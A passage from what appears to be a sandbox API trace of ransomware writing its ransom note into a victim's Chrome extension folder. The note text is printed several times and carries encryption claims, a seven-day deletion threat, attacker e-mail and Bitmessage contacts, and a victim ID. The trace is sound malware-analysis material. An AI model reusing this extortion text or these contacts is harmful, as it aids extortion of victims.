R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.255] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.255] CloseHandle (hObject=0x294) returned 1 [0285.255] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0285.255] GetLastError () returned 0x2 [0285.255] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0285.257] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.257] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.257] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 